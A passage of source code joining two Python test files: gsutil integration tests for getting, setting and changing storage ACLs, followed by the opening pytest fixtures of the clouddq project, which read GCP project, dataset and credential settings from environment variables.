# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for the acl command."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import re
from gslib.command import CreateOrGetGsutilLogger
from gslib.cs_api_map import ApiSelector
from gslib.storage_url import StorageUrlFromString
import gslib.tests.testcase as testcase
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import unittest
from gslib.utils import acl_helper
from gslib.utils.constants import UTF8
from gslib.utils.retry_util import Retry
from gslib.utils.translation_helper import AclTranslation
PUBLIC_READ_JSON_ACL_TEXT = '"entity":"allUsers","role":"READER"'
class TestAclBase(testcase.GsUtilIntegrationTestCase):
"""Integration test case base class for acl command."""
_set_acl_prefix = ['acl', 'set']
_get_acl_prefix = ['acl', 'get']
_set_defacl_prefix = ['defacl', 'set']
_ch_acl_prefix = ['acl', 'ch']
_project_team = 'viewers'
@SkipForS3('Tests use GS ACL model.')
class TestAcl(TestAclBase):
"""Integration tests for acl command."""
def setUp(self):
super(TestAcl, self).setUp()
self.sample_uri = self.CreateBucket()
self.sample_url = StorageUrlFromString(str(self.sample_uri))
self.logger = CreateOrGetGsutilLogger('acl')
# Argument to acl ch -p must be the project number, not a name; create a
# bucket to perform translation.
self._project_number = self.json_api.GetBucket(
self.CreateBucket().bucket_name, fields=['projectNumber']).projectNumber
self._project_test_acl = '%s-%s' % (self._project_team,
self._project_number)
def test_set_invalid_acl_object(self):
"""Ensures that invalid content returns a bad request error."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
inpath = self.CreateTempFile(contents=b'badAcl')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
def test_set_invalid_acl_bucket(self):
"""Ensures that invalid content returns a bad request error."""
bucket_uri = suri(self.CreateBucket())
inpath = self.CreateTempFile(contents=b'badAcl')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
def test_set_xml_acl_json_api_object(self):
"""Ensures XML content returns a bad request error and migration warning."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn('XML ACL data provided', stderr)
def test_set_xml_acl_json_api_bucket(self):
"""Ensures XML content returns a bad request error and migration warning."""
bucket_uri = suri(self.CreateBucket())
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn('XML ACL data provided', stderr)
def test_set_valid_acl_object(self):
"""Tests setting a valid ACL on an object."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + ['public-read', obj_uri])
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri])
acl_string3 = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
self.assertEqual(acl_string, acl_string3)
def test_set_valid_permission_whitespace_object(self):
"""Ensures that whitespace is allowed in role and entity elements."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
acl_string = re.sub(r'"role"', r'"role" \n', acl_string)
acl_string = re.sub(r'"entity"', r'\n "entity"', acl_string)
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri])
def test_set_valid_acl_bucket(self):
"""Ensures that valid canned and XML ACLs work with get/set."""
if self._ServiceAccountCredentialsPresent():
# See comments in _ServiceAccountCredentialsPresent
return unittest.skip('Canned ACLs orphan service account permissions.')
bucket_uri = suri(self.CreateBucket())
acl_string = self.RunGsUtil(self._get_acl_prefix + [bucket_uri],
return_stdout=True)
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + ['public-read', bucket_uri])
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [bucket_uri],
return_stdout=True)
self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri])
acl_string3 = self.RunGsUtil(self._get_acl_prefix + [bucket_uri],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
self.assertEqual(acl_string, acl_string3)
def test_invalid_canned_acl_object(self):
"""Ensures that an invalid canned ACL returns a CommandException."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
stderr = self.RunGsUtil(self._set_acl_prefix +
['not-a-canned-acl', obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn('Invalid canned ACL', stderr)
def test_set_valid_def_acl_bucket(self):
"""Ensures that valid default canned and XML ACLs works with get/set."""
bucket_uri = self.CreateBucket()
# Default ACL is project private.
obj_uri1 = suri(self.CreateObject(bucket_uri=bucket_uri, contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri1],
return_stdout=True)
# Change it to authenticated-read.
self.RunGsUtil(
self._set_defacl_prefix +
['authenticated-read', suri(bucket_uri)])
# Default object ACL may take some time to propagate.
@Retry(AssertionError, tries=5, timeout_secs=1)
def _Check1():
obj_uri2 = suri(self.CreateObject(bucket_uri=bucket_uri,
contents=b'foo2'))
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [obj_uri2],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
self.assertIn('allAuthenticatedUsers', acl_string2)
_Check1()
# Now change it back to the default via XML.
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_defacl_prefix + [inpath, suri(bucket_uri)])
# Default object ACL may take some time to propagate.
@Retry(AssertionError, tries=5, timeout_secs=1)
def _Check2():
obj_uri3 = suri(self.CreateObject(bucket_uri=bucket_uri,
contents=b'foo3'))
acl_string3 = self.RunGsUtil(self._get_acl_prefix + [obj_uri3],
return_stdout=True)
self.assertEqual(acl_string, acl_string3)
_Check2()
def test_acl_set_version_specific_uri(self):
"""Tests setting an ACL on a specific version of an object."""
bucket_uri = self.CreateVersionedBucket()
# Create initial object version.
uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data')
# Create a second object version.
inpath = self.CreateTempFile(contents=b'def')
self.RunGsUtil(['cp', inpath, uri.uri])
# Find out the two object version IDs.
lines = self.AssertNObjectsInBucket(bucket_uri, 2, versioned=True)
v0_uri_str, v1_uri_str = lines[0], lines[1]
# Check that neither version currently has public-read permission
# (default ACL is project-private).
orig_acls = []
for uri_str in (v0_uri_str, v1_uri_str):
acl = self.RunGsUtil(self._get_acl_prefix + [uri_str], return_stdout=True)
self.assertNotIn(PUBLIC_READ_JSON_ACL_TEXT,
self._strip_json_whitespace(acl))
orig_acls.append(acl)
# Set the ACL for the older version of the object to public-read.
self.RunGsUtil(self._set_acl_prefix + ['public-read', v0_uri_str])
# Check that the older version's ACL is public-read, but newer version
# is not.
acl = self.RunGsUtil(self._get_acl_prefix + [v0_uri_str],
return_stdout=True)
self.assertIn(PUBLIC_READ_JSON_ACL_TEXT, self._strip_json_whitespace(acl))
acl = self.RunGsUtil(self._get_acl_prefix + [v1_uri_str],
return_stdout=True)
self.assertNotIn(PUBLIC_READ_JSON_ACL_TEXT,
self._strip_json_whitespace(acl))
# Check that reading the ACL with the version-less URI returns the
# original ACL (since the version-less URI means the current version).
acl = self.RunGsUtil(self._get_acl_prefix + [uri.uri], return_stdout=True)
self.assertEqual(acl, orig_acls[0])
def _strip_json_whitespace(self, json_text):
return re.sub(r'\s*', '', json_text)
def testAclChangeWithUserId(self):
change = acl_helper.AclChange(self.USER_TEST_ID + ':r',
scope_type=acl_helper.ChangeType.USER)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'UserById', self.USER_TEST_ID)
def testAclChangeWithGroupId(self):
change = acl_helper.AclChange(self.GROUP_TEST_ID + ':r',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'GroupById', self.GROUP_TEST_ID)
def testAclChangeWithUserEmail(self):
change = acl_helper.AclChange(self.USER_TEST_ADDRESS + ':r',
scope_type=acl_helper.ChangeType.USER)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'UserByEmail', self.USER_TEST_ADDRESS)
def testAclChangeWithGroupEmail(self):
change = acl_helper.AclChange(self.GROUP_TEST_ADDRESS + ':fc',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'OWNER', 'GroupByEmail', self.GROUP_TEST_ADDRESS)
def testAclChangeWithDomain(self):
change = acl_helper.AclChange(self.DOMAIN_TEST + ':READ',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'GroupByDomain', self.DOMAIN_TEST)
def testAclChangeWithProjectOwners(self):
change = acl_helper.AclChange(self._project_test_acl + ':READ',
scope_type=acl_helper.ChangeType.PROJECT)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'Project', self._project_test_acl)
def testAclChangeWithAllUsers(self):
change = acl_helper.AclChange('AllUsers:WRITE',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'WRITER', 'AllUsers')
def testAclChangeWithAllAuthUsers(self):
change = acl_helper.AclChange('AllAuthenticatedUsers:READ',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'AllAuthenticatedUsers')
remove = acl_helper.AclDel('AllAuthenticatedUsers')
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READER', 'AllAuthenticatedUsers')
def testAclDelWithUser(self):
add = acl_helper.AclChange(self.USER_TEST_ADDRESS + ':READ',
scope_type=acl_helper.ChangeType.USER)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
add.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'UserByEmail', self.USER_TEST_ADDRESS)
remove = acl_helper.AclDel(self.USER_TEST_ADDRESS)
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READ', 'UserByEmail', self.USER_TEST_ADDRESS)
def testAclDelWithProjectOwners(self):
add = acl_helper.AclChange(self._project_test_acl + ':READ',
scope_type=acl_helper.ChangeType.PROJECT)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
add.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'Project', self._project_test_acl)
remove = acl_helper.AclDel(self._project_test_acl)
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READ', 'Project', self._project_test_acl)
def testAclDelWithGroup(self):
add = acl_helper.AclChange(self.USER_TEST_ADDRESS + ':READ',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
add.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'GroupByEmail', self.USER_TEST_ADDRESS)
remove = acl_helper.AclDel(self.USER_TEST_ADDRESS)
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READER', 'GroupByEmail', self.GROUP_TEST_ADDRESS)
#
# Here are a whole lot of verbose asserts
#
def _AssertHas(self, current_acl, perm, scope, value=None):
matches = list(
self._YieldMatchingEntriesJson(current_acl, perm, scope, value))
self.assertEqual(1, len(matches))
def _AssertHasNo(self, current_acl, perm, scope, value=None):
matches = list(
self._YieldMatchingEntriesJson(current_acl, perm, scope, value))
self.assertEqual(0, len(matches))
def _YieldMatchingEntriesJson(self, current_acl, perm, scope, value=None):
"""Generator that yields entries that match the change descriptor.
Args:
current_acl: A list of apitools_messages.BucketAccessControls or
ObjectAccessControls which will be searched for matching
entries.
perm: Role (permission) to match.
scope: Scope type to match.
value: Value to match (against the scope type).
Yields:
An apitools_messages.BucketAccessControl or ObjectAccessControl.
"""
for entry in current_acl:
if (scope in ['UserById', 'GroupById'] and entry.entityId and
value == entry.entityId and entry.role == perm):
yield entry
elif (scope in ['UserByEmail', 'GroupByEmail'] and entry.email and
value == entry.email and entry.role == perm):
yield entry
elif (scope == 'GroupByDomain' and entry.domain and
value == entry.domain and entry.role == perm):
yield entry
elif (scope == 'Project' and entry.role == perm and
value == entry.entityId):
yield entry
elif (scope in ['AllUsers', 'AllAuthenticatedUsers'] and
entry.entity.lower() == scope.lower() and entry.role == perm):
yield entry
def _MakeScopeRegex(self, role, entity_type, email_address):
template_regex = (r'\{.*"entity":\s*"%s-%s".*"role":\s*"%s".*\}' %
(entity_type, email_address, role))
return re.compile(template_regex, flags=re.DOTALL)
def _MakeProjectScopeRegex(self, role, project_team, project_number):
template_regex = (
r'\{.*"entity":\s*"project-%s-%s",\s*"projectTeam":\s*\{\s*"'
r'projectNumber":\s*"%s",\s*"team":\s*"%s"\s*\},\s*"role":\s*"%s".*\}' %
(project_team, project_number, project_number, project_team, role))
return re.compile(template_regex, flags=re.DOTALL)
def testBucketAclChange(self):
"""Tests acl change on a bucket."""
test_regex = self._MakeScopeRegex('OWNER', 'user', self.USER_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
self.RunGsUtil(
self._ch_acl_prefix +
['-u', self.USER_TEST_ADDRESS +
':fc', suri(self.sample_uri)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
test_regex2 = self._MakeScopeRegex('WRITER', 'user', self.USER_TEST_ADDRESS)
self.RunGsUtil(self._ch_acl_prefix +
['-u', self.USER_TEST_ADDRESS + ':w',
suri(self.sample_uri)])
json_text2 = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertRegex(json_text2, test_regex2)
self.RunGsUtil(self._ch_acl_prefix +
['-d', self.USER_TEST_ADDRESS,
suri(self.sample_uri)])
json_text3 = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertNotRegex(json_text3, test_regex)
def testProjectAclChangesOnBucket(self):
"""Tests project entity acl changes on a bucket."""
if self.test_api == ApiSelector.XML:
stderr = self.RunGsUtil(
self._ch_acl_prefix +
['-p', self._project_test_acl + ':w',
suri(self.sample_uri)],
expected_status=1,
return_stderr=True)
self.assertIn(('CommandException: XML API does not support project'
' scopes, cannot translate ACL.'), stderr)
else:
test_regex = self._MakeProjectScopeRegex('WRITER', self._project_team,
self._project_number)
self.RunGsUtil(
self._ch_acl_prefix +
['-p', self._project_test_acl +
':w', suri(self.sample_uri)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(self.sample_uri)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
self.RunGsUtil(self._ch_acl_prefix +
['-d', self._project_test_acl,
suri(self.sample_uri)])
json_text2 = self.RunGsUtil(self._get_acl_prefix +
[suri(self.sample_uri)],
return_stdout=True)
self.assertNotRegex(json_text2, test_regex)
def testObjectAclChange(self):
"""Tests acl change on an object."""
obj = self.CreateObject(bucket_uri=self.sample_uri, contents=b'something')
self.AssertNObjectsInBucket(self.sample_uri, 1)
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
self.RunGsUtil(self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS +
':READ', suri(obj)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
test_regex2 = self._MakeScopeRegex('OWNER', 'group',
self.GROUP_TEST_ADDRESS)
self.RunGsUtil(self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS + ':OWNER',
suri(obj)])
json_text2 = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text2, test_regex2)
self.RunGsUtil(self._ch_acl_prefix +
['-d', self.GROUP_TEST_ADDRESS,
suri(obj)])
json_text3 = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text3, test_regex2)
all_auth_regex = re.compile(
r'\{.*"entity":\s*"allAuthenticatedUsers".*"role":\s*"OWNER".*\}',
flags=re.DOTALL)
self.RunGsUtil(self._ch_acl_prefix + ['-g', 'AllAuth:O', suri(obj)])
json_text4 = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text4, all_auth_regex)
def testObjectAclChangeAllUsers(self):
"""Tests acl ch AllUsers:R on an object."""
obj = self.CreateObject(bucket_uri=self.sample_uri, contents=b'something')
self.AssertNObjectsInBucket(self.sample_uri, 1)
all_users_regex = re.compile(
r'\{.*"entity":\s*"allUsers".*"role":\s*"READER".*\}', flags=re.DOTALL)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, all_users_regex)
self.RunGsUtil(self._ch_acl_prefix + ['-g', 'AllUsers:R', suri(obj)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text, all_users_regex)
def testSeekAheadAcl(self):
"""Tests seek-ahead iterator with ACL sub-commands."""
object_uri = self.CreateObject(contents=b'foo')
# Get the object's current ACL for application via set.
current_acl = self.RunGsUtil(['acl', 'get', suri(object_uri)],
return_stdout=True)
current_acl_file = self.CreateTempFile(contents=current_acl.encode(UTF8))
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'acl', 'ch', '-u', 'AllUsers:R',
suri(object_uri)],
return_stderr=True)
self.assertIn('Estimated work for this command: objects: 1\n', stderr)
stderr = self.RunGsUtil(
['-m', 'acl', 'set', current_acl_file,
suri(object_uri)],
return_stderr=True)
self.assertIn('Estimated work for this command: objects: 1\n', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'acl', 'ch', '-u', 'AllUsers:R',
suri(object_uri)],
return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def testMultithreadedAclChange(self, count=10):
"""Tests multi-threaded acl changing on several objects."""
objects = []
for i in range(count):
objects.append(
self.CreateObject(bucket_uri=self.sample_uri,
contents='something {0}'.format(i).encode('ascii')))
self.AssertNObjectsInBucket(self.sample_uri, count)
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_texts = []
for obj in objects:
json_texts.append(
self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True))
for json_text in json_texts:
self.assertNotRegex(json_text, test_regex)
uris = [suri(obj) for obj in objects]
self.RunGsUtil(['-m', '-DD'] + self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS + ':READ'] + uris)
json_texts = []
for obj in objects:
json_texts.append(
self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True))
for json_text in json_texts:
self.assertRegex(json_text, test_regex)
def testRecursiveChangeAcl(self):
"""Tests recursively changing ACLs on nested objects."""
obj = self.CreateObject(bucket_uri=self.sample_uri,
object_name='foo/bar',
contents=b'something')
self.AssertNObjectsInBucket(self.sample_uri, 1)
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
@Retry(AssertionError, tries=5, timeout_secs=1)
def _AddAcl():
self.RunGsUtil(
self._ch_acl_prefix +
['-R', '-g', self.GROUP_TEST_ADDRESS + ':READ',
suri(obj)[:-3]])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertRegex(json_text, test_regex)
_AddAcl()
@Retry(AssertionError, tries=5, timeout_secs=1)
def _DeleteAcl():
# Make sure we treat grant addresses case insensitively.
delete_grant = self.GROUP_TEST_ADDRESS.upper()
self.RunGsUtil(self._ch_acl_prefix + ['-d', delete_grant, suri(obj)])
json_text = self.RunGsUtil(self._get_acl_prefix + [suri(obj)],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
_DeleteAcl()
def testMultiVersionSupport(self):
"""Tests changing ACLs on multiple object versions."""
bucket = self.CreateVersionedBucket()
object_name = self.MakeTempName('obj')
obj1_uri = self.CreateObject(bucket_uri=bucket,
object_name=object_name,
contents=b'One thing')
# Create another on the same URI, giving us a second version.
self.CreateObject(bucket_uri=bucket,
object_name=object_name,
contents=b'Another thing',
gs_idempotent_generation=urigen(obj1_uri))
lines = self.AssertNObjectsInBucket(bucket, 2, versioned=True)
obj_v1, obj_v2 = lines[0], lines[1]
test_regex = self._MakeScopeRegex('READER', 'group',
self.GROUP_TEST_ADDRESS)
json_text = self.RunGsUtil(self._get_acl_prefix + [obj_v1],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
self.RunGsUtil(self._ch_acl_prefix +
['-g', self.GROUP_TEST_ADDRESS + ':READ', obj_v1])
json_text = self.RunGsUtil(self._get_acl_prefix + [obj_v1],
return_stdout=True)
self.assertRegex(json_text, test_regex)
json_text = self.RunGsUtil(self._get_acl_prefix + [obj_v2],
return_stdout=True)
self.assertNotRegex(json_text, test_regex)
def testBadRequestAclChange(self):
stdout, stderr = self.RunGsUtil(
self._ch_acl_prefix +
['-u', 'invalid_$$@hello.com:R',
suri(self.sample_uri)],
return_stdout=True,
return_stderr=True,
expected_status=1)
self.assertIn('BadRequestException', stderr)
self.assertNotIn('Retrying', stdout)
self.assertNotIn('Retrying', stderr)
def testAclGetWithoutFullControl(self):
object_uri = self.CreateObject(contents=b'foo')
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(self._get_acl_prefix + [suri(object_uri)],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
def testTooFewArgumentsFails(self):
"""Tests calling ACL commands with insufficient number of arguments."""
# No arguments for get, but valid subcommand.
stderr = self.RunGsUtil(self._get_acl_prefix,
return_stderr=True,
expected_status=1)
self.assertIn('command requires at least', stderr)
# No arguments for set, but valid subcommand.
stderr = self.RunGsUtil(self._set_acl_prefix,
return_stderr=True,
expected_status=1)
self.assertIn('command requires at least', stderr)
# No arguments for ch, but valid subcommand.
stderr = self.RunGsUtil(self._ch_acl_prefix,
return_stderr=True,
expected_status=1)
self.assertIn('command requires at least', stderr)
# Neither arguments nor subcommand.
stderr = self.RunGsUtil(['acl'], return_stderr=True, expected_status=1)
self.assertIn('command requires at least', stderr)
def testMinusF(self):
"""Tests -f option to continue after failure."""
bucket_uri = self.CreateBucket()
obj_uri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.RunGsUtil(self._set_acl_prefix +
['-f', 'public-read',
suri(bucket_uri) + 'foo2', obj_uri],
expected_status=1)
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
class TestS3CompatibleAcl(TestAclBase):
"""ACL integration tests that work for s3 and gs URLs."""
def testAclObjectGetSet(self):
bucket_uri = self.CreateBucket()
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
self.AssertNObjectsInBucket(bucket_uri, 1)
stdout = self.RunGsUtil(self._get_acl_prefix + [suri(obj_uri)],
return_stdout=True)
set_contents = self.CreateTempFile(contents=stdout.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + [set_contents, suri(obj_uri)])
def testAclBucketGetSet(self):
bucket_uri = self.CreateBucket()
stdout = self.RunGsUtil(self._get_acl_prefix + [suri(bucket_uri)],
return_stdout=True)
set_contents = self.CreateTempFile(contents=stdout.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + [set_contents, suri(bucket_uri)])
@SkipForGS('S3 ACLs accept XML and should not cause an XML warning.')
class TestS3OnlyAcl(TestAclBase):
"""ACL integration tests that work only for s3 URLs."""
# TODO: Format all test case names consistently.
def test_set_xml_acl(self):
"""Ensures XML content does not return an XML warning for S3."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('BadRequestException', stderr)
self.assertNotIn('XML ACL data provided', stderr)
def test_set_xml_acl_bucket(self):
"""Ensures XML content does not return an XML warning for S3."""
bucket_uri = suri(self.CreateBucket())
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri],
return_stderr=True,
expected_status=1)
self.assertIn('BadRequestException', stderr)
self.assertNotIn('XML ACL data provided', stderr)
class TestAclOldAlias(TestAcl):
_set_acl_prefix = ['setacl']
_get_acl_prefix = ['getacl']
_set_defacl_prefix = ['setdefacl']
_ch_acl_prefix = ['chacl']
|
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import logging
import os
import shutil
import click.testing
import pytest
from clouddq.integration.bigquery.bigquery_client import BigQueryClient
from clouddq.integration.dataplex.clouddq_dataplex import CloudDqDataplexClient
from clouddq.lib import prepare_configs_cache
from clouddq.utils import working_directory
logger = logging.getLogger(__name__)
@pytest.fixture(scope="session")
def gcp_project_id():
gcp_project_id = os.environ.get('GOOGLE_CLOUD_PROJECT', None)
if not gcp_project_id:
logger.warning("Required test environment variable GOOGLE_CLOUD_PROJECT "
"cannot be found. Set this to the project_id used for integration testing.")
# Todo: remove this once test fixture for creating dataplex entities is complete
test_project_id = "dataplex-clouddq"
logging.warning(f"Defaulting to using test: {test_project_id}")
gcp_project_id = test_project_id
return gcp_project_id
@pytest.fixture(scope="session")
def gcp_bq_dataset():
gcp_bq_dataset = os.environ.get('CLOUDDQ_BIGQUERY_DATASET', None)
if not gcp_bq_dataset:
logger.fatal("Required test environment variable CLOUDDQ_BIGQUERY_DATASET "
"cannot be found. Set this to the BigQuery dataset used for integration testing.")
return gcp_bq_dataset
@pytest.fixture(scope="session")
def gcp_bq_region():
gcp_bq_region = os.environ.get('CLOUDDQ_BIGQUERY_REGION', None)
if not gcp_bq_region:
logger.fatal("Required test environment variable CLOUDDQ_BIGQUERY_REGION "
"cannot be found. Set this to the BigQuery region used for integration testing.")
return gcp_bq_region
@pytest.fixture(scope="session")
def gcp_application_credentials():
gcp_application_credentials = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS', None)
if not gcp_application_credentials:
logger.warning("Test environment variable GOOGLE_APPLICATION_CREDENTIALS "
"cannot be found. Set this to the exported service account key path used "
"for integration testing. The tests will proceed skipping all tests "
"involving exported service-account key credentials.")
if os.environ.get('GOOGLE_APPLICATION_CREDENTIALS', None) == "":
del os.environ["GOOGLE_APPLICATION_CREDENTIALS"]
return gcp_application_credentials
@pytest.fixture(scope="session")
def gcp_sa_key():
sa_key_path = os.environ.get('GOOGLE_SDK_CREDENTIALS', None)
if not sa_key_path:
logger.warning("Test environment variable GOOGLE_SDK_CREDENTIALS "
"cannot be found. Set this to the exported service account key "
"path used for integration testing. The tests will proceed skipping "
"all tests involving exported service-account key credentials.")
if os.environ["GOOGLE_SDK_CREDENTIALS"]:
del os.environ["GOOGLE_SDK_CREDENTIALS"]
return sa_key_path
@pytest.fixture(scope="session")
def gcp_impersonation_credentials():
